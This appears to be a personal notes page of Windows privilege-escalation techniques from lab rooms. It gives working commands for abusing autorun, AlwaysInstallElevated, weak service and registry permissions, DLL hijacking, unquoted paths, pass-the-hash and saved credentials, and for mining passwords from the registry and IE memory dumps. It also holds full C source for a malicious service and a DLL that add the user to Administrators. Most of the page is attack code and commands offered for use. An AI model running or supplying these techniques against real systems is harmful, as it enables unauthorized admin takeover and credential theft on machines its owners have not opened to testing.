Rooms
⚠️
These are just some of the things you can try to escalate privilege on a Windows system. This is not meant to be an exhaustive list, and is just scratching the surface of Windows privilege escalation.
Be flexible and diligent in your checks. Most of these are just examples and you don't have to follow them word-for-word. Check other services, other files, other registry keys, use these as an example.
Registry
Autorun
Method 1: Registry
- Check for autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- If there are any autorun programs, you may be able to overwrite the binary
- Use the
accesschk.exe
oricacls
to check your permissions on this directoryaccesschk.exe /accepteula -wvu C:\Program Files\Autorun Program\
- If any of the files are writable, can overwrite with a reverse shell payload
- When an administrative user logs on, we can get an elevated shell
- Need to have listener running continuously to catch logons
AlwaysInstallElevated
- Check if the
AlwaysInstallElevated
setting has been enabled
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- If either of those queries return
1
, can get an elevated shell - Use
msfvenom
to create an.msi
payload and run it on the target- Start a listener
- Run this commamnd to install the malicious program
msiexec /quiet /qn /i <path to msi>
Services
HKLM:\System\CurrentControlSet\services\regsvc
- Open PowerShell and check your permissions on this regitry key
Get-Acl hklm:\System\CurrentControlSet\services\regsvc
- If your user accout or a group you're a member of can register services, then you can create a malicious service to perform a privileged task
- Create a dummy Windows service
- An example service is shown below
- Modify the source code here
- Enter the command in
system()
- Use the command
cmd.exe /k net localgroup administrators user /add
- This will add the current user to the
Administrators
local group
- An example service is shown below
- In Kali, compile the
.c
code to a.exe
x86_64-w64-mingw32-gcc windows_service.c -o privesc.exe
- Transfer
privesc.exe
to a writable folder on the target - Register the service
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d [C:\Path\to\privesc.exe] /f
- Start the service
sc.exe start regsvc
- Confirm the current user has been added to the local administrator group
windows_service.c
#include <windows.h>
#include <stdio.h>
#define SLEEP_TIME 5000
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);
//add the payload here
int Run()
{
system("cmd.exe /k net localgroup administrators user /add");
return 0;
}
int main()
{
SERVICE_TABLE_ENTRY ServiceTable[2];
ServiceTable[0].lpServiceName = "MyService";
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
void ServiceMain(int argc, char** argv)
{
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN
;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandl
er);
Run();
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
{
Sleep(SLEEP_TIME);
}
return;
}
void ControlHandler(DWORD request)
{
switch(request)
{
case SERVICE_CONTROL_STOP:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (hStatus, &ServiceStatus);
return;
default:
break;
}
SetServiceStatus (hStatus, &ServiceStatus);
return;
}
File Permissions Service
- You can follow this process on other services as well
- The File Permissions Service is just used here as an example
- Check the configuration of
filepermsvc
sc.exe qc filepermsvc
- Note that it runs as
SYSTEM
- See if you or a group you're in can modify the service
accesschk64.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
- For example, if
Everyone
hasFILE_ALL_ACCESS
, you can overwrite the service binary, so when the service starts, the malicious binary is run - Using the
windows_service.c
service from before- Or, could be a reverse shell to spawn a
SYSTEM
shell - Copy
privesc.exe
asC:\Program Files\File Permissions Service\filepermservice.exe
- Or, could be a reverse shell to spawn a
- Run this command to restart the service
sc.exe stop filepermsvc && start filepermsvc
- Current user should have been added to local administrator group
DLL Hijacking
- In this example, a service loads a
DLL
from a directory where we have write permissions- We can determine this by running
procmon
on the target - Or by running the executable copied from the target on a test machine
- We can determine this by running
- We can create a malicious
DLL
that will be loaded by the service instead- Compile the C code to DLL on Kali:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijacked.dll
- Copy the DLL to the target path
- Start the service
sc.exe start <service>
Example DLL Code
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k net localgroup administrators user /add");
ExitProcess(0);
}
return TRUE;
}
Insecure Service Permissions
- Similar to the File Permissions Service attack before
- Check a service's permissions to see if we can modify it
- In this example, we're checking
daclsvc
, but other services should be checked as well
- In this example, we're checking
accesschk.exe /accepteula -uwcqv daclsvc
accesschk64.exe /accepteula -wuvc daclsvc
- Query the service to see if it runs as
System
sc.exe qc daclsvc
- If we have
SERVICE_CHANGE_CONFIG
, we can manipulate a service
sc.exe config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
- This will add the current user to the local Administrators group when the service is started or restarted
Unquoted Service Path
sc.exe qc <service>
to query a service- Especially useful if a service is running as
NT Authority\SYSTEM
- If a service's
BINARY_PATH_NAME
is not wrapped in quotes- Example:
C:\Program Files\Service Directory\awesome.exe
- We need to find if any part of that path is writable
- If
C:\
is writable, we can create aProgram.exe
payload - If
C:\Program Files\
is writable, we can a createService.exe
payload - If
C:\Program Files\Service Directory\
is writable, we can create anawesome.exe
payload
- Example:
Startup Applications
- In a lower privileged shell, run
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- If
BUILTIN\Users
has(F)
, we can add a payload there - Use
msfvenom
to generate a reverse shellexe
payload - Put the payload in the folder
- Start a listener
- Wait for an admin to login
Passing the Hash
pth-winexe
pth-winexe -U 'username%hash' //MACHINE_IP cmd.exe
- If you have a hash of a user
- This is just an example, I've written more notes here on passing the hash
Scheduled Tasks
- Check for scheduled tasks running as privileged accounts
- If the task is running a script, check the permissions on the script
accesschk.exe /accepteula -quvw user C:\path\to\script
- May be able to overwrite or modify the script contents
- Could run a command or reverse shell
Hot Potato
Invoke-Tater
- Invoke-Tater.ps1
- If the host is vulnerable to the Hot Potato privilege escalation, will run commands as
System
, as we will be able to impersonate the SYSTEM account - Import the script
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add
- Current user should now be a member of the local administrators group
Password Mining
Registry
- Search for the word
password
recursively
reg query HKLM /f password /t REG_SZ /s
- Might be something here as a quick search
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
- Spawn an admin shell from Kali
winexe -U 'username%password' //target-ip cmd.exe
- This is just an example. I've written more notes here on passing the password.
cmdkey
cmdkey /list
to list any saved credentials- Start a reverse shell as the user
runas /savecred /user:username C:\PrivEsc\reverse.exe
C:\Windows\Panther\Unattend.xml
- Check the
<Password>
property for abase64
encoded password
Internet Explorer Memory Dump
- Start
msfconsole
use auxiliary/server/capture/http_basic
set uripath pwn
run
- Victim
- Open Internet Explorer
- Go to
http://kali-ip/pwn
- Open Task Manager
- Right-click
iexpore.exe
> Image Name > Create Dump File - Transfer the
.DMP
file to Kali
- Kali
- Check if there are any saved credentials in the IE dump
strings file.DMP | grep "Authorization: Basic"
- If so, decode the base64 string.
echo -ne "base64string" | base64 -d
GUI Apps
Run as Admin
- If a GUI app is set to run as admin at launch
- Example: MS Paint
- Launch Paint
- File > Open
- Enter
file://C:/Windows/System32/cmd.exe
- Launch Paint
- Example: MS Paint
Kernel Exploits
Scripts
- Can run exploit suggesting scripts to detect kernel exploits
winPEASany.exe
Seatbelt.exe
PowerUp.ps1
SharpUp.exe